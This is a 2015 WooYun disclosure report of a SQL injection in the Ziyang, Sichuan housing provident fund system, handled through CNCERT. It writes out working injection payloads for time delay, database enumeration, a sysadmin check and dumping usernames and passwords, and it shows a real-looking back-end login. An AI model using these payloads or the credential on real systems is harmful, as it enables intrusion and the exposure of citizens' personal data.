当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0140923

漏洞标题:四川省资阳市住房公积金系统存在注入漏洞(sa权限)

相关厂商:四川省资阳市住房公积金系统

漏洞作者: 二愣子

提交时间:2015-09-15 20:12

修复时间:2015-11-01 16:02

公开时间:2015-11-01 16:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-15: 细节已通知厂商并且等待厂商处理中
2015-09-17: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-27: 细节向核心白帽子及相关领域专家公开
2015-10-07: 细节向普通白帽子公开
2015-10-17: 细节向实习白帽子公开
2015-11-01: 细节向公众公开

简要描述:

热河路就像八十年代的金坛县
梧桐 垃圾 灰尘
和各式各样的杂货店
四川省资阳市住房公积金系统存在注入漏洞(sa权限),威胁近20w个人信息+6个公积金相关库

详细说明:

存在360web,手工测试,纯属学习
注入点:

http://**.**.**.**/zcfw/qrcx.asp(POST)
Submit22=%CC%E1%BD%BB&password=123456&name=1  注入点就在这个name参数上


payload

Submit22=%CC%E1%BD%BB&password=12345%u0036&name=1');waitfor%0adelay%0a'0:0:5'--


1、数据库信息

Submit22=%CC%E1%BD%BB&password=123456&name=1')%0aand/**/db_name(N)=1--
当前库		HouseFundZy
dbid=7		HouseFundLog
dbid=8		HouseFundZy
dbid=9		HouseFundZyHis
dbid=10		SD_HFMS_ZY20120630
dbid=12		HouseFundWeb
dbid=13		HouseFundPassword


2、泄露用户量近20w

Submit22=%CC%E1%BD%BB&password=123456&name=1')%0aand/**/(select%0acount(*)from%0aadmin_gr)>171800--


利用得到的name以及pass,可以登录后台。泄露数据信息至少有如下几种
单位编码
个人帐号
职工姓名
身份证号
职工明细帐信息
3、sa用户

Submit22=%CC%E1%BD%BB&password=123456&name=1')%0a%u0061nd%0aIS_SRVROLEMEMBER('sysadmin')=1--

漏洞证明:

1、个人信息泄露示例
payload:

Submit22=%CC%E1%BD%BB&password=123456&name=1')%0aand%0a(select%0atop%0a50%0aname,pass%0afrom%0aadmin_gr%0afor%0axml%0apath(''))=1--


1.png


随机选择一个单位用户登录,

username:wjf
password:1234
POST
Submit22=%CC%E1%BD%BB&password=1234&name=wjf


2.png


3.png


修复方案:

你们更专业

版权声明:转载请注明来源 二愣子@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-09-17 16:00

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给四川分中心,由其后续协调网站管理单位处置。

最新状态:

暂无